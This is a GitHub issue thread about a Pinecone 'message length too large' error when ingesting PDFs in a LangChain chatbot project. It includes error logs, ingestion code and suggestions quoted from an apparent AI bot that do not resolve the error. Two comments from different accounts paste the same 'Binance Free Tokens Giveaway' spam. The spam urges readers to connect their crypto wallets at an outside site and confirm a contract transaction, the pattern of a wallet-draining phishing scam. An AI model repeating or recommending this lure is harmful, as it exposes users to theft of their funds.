### ISSUE TITLE
PineconeError: Error, message length too large: found 5453452 bytes, the limit is: 4194304 bytes

### ISSUE THREAD

**Issue by YIN-Renlong** [mayooear/gpt4-pdf-chatbot-langchain#440]
Hi everyone, for some pdf files, I get the following error during ingest process ` npm run ingest`, is there any way to fix it? Thanks

`
creating vector store...
error [PineconeError: PineconeClient: Error calling upsert: PineconeError: Error, message length too large: found 5453452 bytes, the limit is: 4194304 bytes]
/Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:46
    throw new Error('Failed to ingest your data');
          ^
`

`
Error: Failed to ingest your data
    at run (/Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:46:11)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at <anonymous> (/Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:51:3)
`

**Comment by YIN-Renlong** [comment]
> _🤖_
> 
> Hello @YIN-Renlong! Good to see you here again. I hope you're having a great day.
> 
> The error you're encountering is due to the size of the data being ingested exceeding the limit set by Pinecone. This is likely happening because the `chunkSize` parameter in the `RecursiveCharacterTextSplitter` function is set too high for the size of your PDF files.
> 
> The `chunkSize` parameter determines the size of the text chunks that are being processed. If the message length is too large, reducing the `chunkSize` should help. Currently, the `chunkSize` is set to 1000 in the `ingest-data.ts` script:
> 
> ```ts
> const textSplitter = new RecursiveCharacterTextSplitter({
>   chunkSize: 1000,
>   chunkOverlap: 200,
> });
> ```
> 
> You can try reducing the `chunkSize` to a smaller value, for example, 500:
> 
> ```ts
> const textSplitter = new RecursiveCharacterTextSplitter({
>   chunkSize: 500, // reduce chunkSize from 1000 to 500
>   chunkOverlap: 200,
> });
> ```
> 
> Please note that reducing the `chunkSize` will increase the number of chunks and may affect the performance of the ingestion process. It's important to find a balance between the chunk size and the performance that suits your specific use case.
> 
> You can find the `ingest-data.ts` script in the repository [here](https://github.com/mayooear/gpt4-pdf-chatbot-langchain/blob/main/scripts/ingest-data.ts).
> 
> Let me know if this helps or if you need further assistance.
> 
> ## Sources
> * [npm run ingest / Pinecone error ](https://github.com/mayooear/gpt4-pdf-chatbot-langchain/issues/350)
> * [Error: Failed to ingest your data](https://github.com/mayooear/gpt4-pdf-chatbot-langchain/issues/309)
> * [npm run ingest error](https://github.com/mayooear/gpt4-pdf-chatbot-langchain/issues/261)
> * [scripts/ingest-data.ts](https://github.com/mayooear/gpt4-pdf-chatbot-langchain/blob/main/scripts/ingest-data.ts)

@dosubot  thanks. According to your plan, I changed the value from 1000 to 500 (chunkSize: 1000 to chunkSize: 500). However, the problem still arises and I got this error:

`
creating vector store...
error [PineconeError: PineconeClient: Error calling upsert: PineconeError: Error, message length too large: found 5432637 bytes, the limit is: 4194304 bytes]
/Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:46
    throw new Error('Failed to ingest your data');
          ^
Error: Failed to ingest your data
    at run (/Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:46:11)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at <anonymous> (/Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:51:3)
`

This means that your solution may not be successful in solving the problem. So, do you have a better opinion?

**Comment by YIN-Renlong** [comment]
> A third solution could be to implement a check in the `PineconeStore.fromDocuments` method to ensure that the size of the data being upserted does not exceed Pinecone's limit. If the data size is too large, you could split the data into smaller batches and upsert them separately. Here's a rough example of how you could implement this:

thanks, I followed your third solution, however, error still happens:

creating vector store...
error [PineconeError: PineconeClient: Error calling upsert: PineconeError: Error, message length too large: found 5451652 bytes, the limit is: 4194304 bytes]
/Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:54
    throw new Error('Failed to ingest your data');
          ^
Error: Failed to ingest your data
    at run (/Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:54:11)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at <anonymous> (/Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:59:3)

the following is the full code of 'ingest-data.ts' after modify:

import { RecursiveCharacterTextSplitter } from 'langchain/text_splitter';
import { OpenAIEmbeddings } from 'langchain/embeddings/openai';
import { PineconeStore } from 'langchain/vectorstores/pinecone';
import { pinecone } from '@/utils/pinecone-client';
import { PDFLoader } from 'langchain/document_loaders/fs/pdf';
import { PINECONE_INDEX_NAME } from '@/config/pinecone';
import { DirectoryLoader } from 'langchain/document_loaders/fs/directory';

/* Name of directory to retrieve your files from 
   Make sure to add your PDF files inside the 'docs' folder
*/
const filePath = 'docs';

export const run = async () => {
  try {
    /*load raw docs from the all files in the directory */
    const directoryLoader = new DirectoryLoader(filePath, {
      '.pdf': (path) => new PDFLoader(path),
    });

    // const loader = new PDFLoader(filePath);
    const rawDocs = await directoryLoader.load();

    /* Split text into chunks */
    const textSplitter = new RecursiveCharacterTextSplitter({
      chunkSize: 1000,
      chunkOverlap: 200,
    });

    const BATCH_SIZE = 100; // Adjust this value as needed


    const docs = await textSplitter.splitDocuments(rawDocs);
    console.log('split docs', docs);

    console.log('creating vector store...');
    /*create and store the embeddings in the vectorStore*/
    const embeddings = new OpenAIEmbeddings();
    const index = pinecone.Index(PINECONE_INDEX_NAME); //change to your own index name

    // Split docs into batches
    for (let i = 0; i < docs.length; i += BATCH_SIZE) {
      const batch = docs.slice(i, i + BATCH_SIZE);

      // Embed and upsert each batch separately
      await PineconeStore.fromDocuments(batch, embeddings, {
        pineconeIndex: index,
        //namespace: PINECONE_NAME_SPACE,
        textKey: 'text',
      });
    }
  } catch (error) {
    console.log('error', error);
    throw new Error('Failed to ingest your data');
  }
};

(async () => {
  await run();
  console.log('ingestion complete');
})();


Let me know please what should I do now, thanks.

**Comment by YIN-Renlong** [comment]
> thanks, I followed your third solution, however, error still happens: `creating vector store... error [PineconeError: PineconeClient: Error calling upsert: PineconeError: Error, message length too large: found 5451652 bytes, the limit is: 4194304 bytes] /Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:54 throw new Error('Failed to ingest your data'); ^ Error: Failed to ingest your data at run (/Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:54:11) at process.processTicksAndRejections (node:internal/process/task_queues:95:5) at <anonymous> (/Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:59:3)`
> 
> the following is the full code of 'ingest-data.ts' after modify:
> 
> ` import { RecursiveCharacterTextSplitter } from 'langchain/text_splitter'; import { OpenAIEmbeddings } from 'langchain/embeddings/openai'; import { PineconeStore } from 'langchain/vectorstores/pinecone'; import { pinecone } from '@/utils/pinecone-client'; import { PDFLoader } from 'langchain/document_loaders/fs/pdf'; import { PINECONE_INDEX_NAME } from '@/config/pinecone'; import { DirectoryLoader } from 'langchain/document_loaders/fs/directory';
> 
> /* Name of directory to retrieve your files from Make sure to add your PDF files inside the 'docs' folder */ const filePath = 'docs';
> 
> export const run = async () => { try { /*load raw docs from the all files in the directory */ const directoryLoader = new DirectoryLoader(filePath, { '.pdf': (path) => new PDFLoader(path), });
> 
> ```
> // const loader = new PDFLoader(filePath);
> const rawDocs = await directoryLoader.load();
> 
> /* Split text into chunks */
> const textSplitter = new RecursiveCharacterTextSplitter({
>   chunkSize: 1000,
>   chunkOverlap: 200,
> });
> 
> const BATCH_SIZE = 100; // Adjust this value as needed
> 
> 
> const docs = await textSplitter.splitDocuments(rawDocs);
> console.log('split docs', docs);
> 
> console.log('creating vector store...');
> /*create and store the embeddings in the vectorStore*/
> const embeddings = new OpenAIEmbeddings();
> const index = pinecone.Index(PINECONE_INDEX_NAME); //change to your own index name
> 
> // Split docs into batches
> for (let i = 0; i < docs.length; i += BATCH_SIZE) {
>   const batch = docs.slice(i, i + BATCH_SIZE);
> 
>   // Embed and upsert each batch separately
>   await PineconeStore.fromDocuments(batch, embeddings, {
>     pineconeIndex: index,
>     //namespace: PINECONE_NAME_SPACE,
>     textKey: 'text',
>   });
> }
> ```
> 
> } catch (error) { console.log('error', error); throw new Error('Failed to ingest your data'); } };
> 
> (async () => { await run(); console.log('ingestion complete'); })(); `
> 
> Let me know please what should I do now, thanks.

thanks, I followed your third solution, however, error still happens:
creating vector store... error [PineconeError: PineconeClient: Error calling upsert: PineconeError: Error, message length too large: found 5451652 bytes, the limit is: 4194304 bytes] /Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:54 throw new Error('Failed to ingest your data'); ^ Error: Failed to ingest your data at run (/Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:54:11) at process.processTicksAndRejections (node:internal/process/task_queues:95:5) at <anonymous> (/Applications/gpt4chatbot/gpt4-pdf-chatbot-langchain-cnr/scripts/ingest-data.ts:59:3)

the following is the full code of 'ingest-data.ts' after modify:

`
import { RecursiveCharacterTextSplitter } from 'langchain/text_splitter';
import { OpenAIEmbeddings } from 'langchain/embeddings/openai';
import { PineconeStore } from 'langchain/vectorstores/pinecone';
import { pinecone } from '@/utils/pinecone-client';
import { PDFLoader } from 'langchain/document_loaders/fs/pdf';
import { PINECONE_INDEX_NAME } from '@/config/pinecone';
import { DirectoryLoader } from 'langchain/document_loaders/fs/directory';

/* Name of directory to retrieve your files from
Make sure to add your PDF files inside the 'docs' folder
*/
const filePath = 'docs';

export const run = async () => {
try {
/*load raw docs from the all files in the directory */
const directoryLoader = new DirectoryLoader(filePath, {
'.pdf': (path) => new PDFLoader(path),
});

// const loader = new PDFLoader(filePath);
const rawDocs = await directoryLoader.load();

/* Split text into chunks */
const textSplitter = new RecursiveCharacterTextSplitter({
  chunkSize: 1000,
  chunkOverlap: 200,
});

const BATCH_SIZE = 100; // Adjust this value as needed


const docs = await textSplitter.splitDocuments(rawDocs);
console.log('split docs', docs);

console.log('creating vector store...');
/*create and store the embeddings in the vectorStore*/
const embeddings = new OpenAIEmbeddings();
const index = pinecone.Index(PINECONE_INDEX_NAME); //change to your own index name

// Split docs into batches
for (let i = 0; i < docs.length; i += BATCH_SIZE) {
  const batch = docs.slice(i, i + BATCH_SIZE);

  // Embed and upsert each batch separately
  await PineconeStore.fromDocuments(batch, embeddings, {
    pineconeIndex: index,
    //namespace: PINECONE_NAME_SPACE,
    textKey: 'text',
  });
}
} catch (error) {
console.log('error', error);
throw new Error('Failed to ingest your data');
}
};

(async () => {
await run();
console.log('ingestion complete');
})();
`

Please let me know please what should I debug now, thanks.

**Comment by p4u1d34n** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by manoharkumarmahto** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by juanlet** [comment]
Same happens with GoogleGenerativeAIEmbeddings. Lowering the chunk size has no effect on the error message. Same with passing batch_size=10 to PineconeVectorStore.from_documents function. Embeds have 768 dimensions using nvidia-llama vector database configuration in Pinecone

```
HTTP response headers: HTTPHeaderDict({'Date': 'Mon, 05 May 2025 22:24:36 GMT', 'Content-Type': 'application/json', 'Content-Length': '118', 'Connection': 'keep-alive', 'x-pinecone-request-latency-ms': '2075', 'x-pinecone-request-id': '5819149490934063290', 'x-envoy-upstream-service-time': '2', 'server': 'envoy'})
HTTP response body: {"code":11,"message":"Error, message length too large: found 4256465 bytes, the limit is: 4194304 bytes","details":[]}

```

```
text_splitter = RecursiveCharacterTextSplitter(
        chunk_size=300,
        chunk_overlap=50,
    )
    documents = text_splitter.split_documents(raw_documents)
    for doc in documents:
        .......................................
    
    print(f'Adding {len(documents)} to Pinecone')
    embeddings = GoogleGenerativeAIEmbeddings(model="models/text-embedding-004")
    print('Ingesting to Pinecone...')
    PineconeVectorStore.from_documents(
        documents,
        embeddings,
        index_name=os.environ['INDEX_NAME']
    )
```
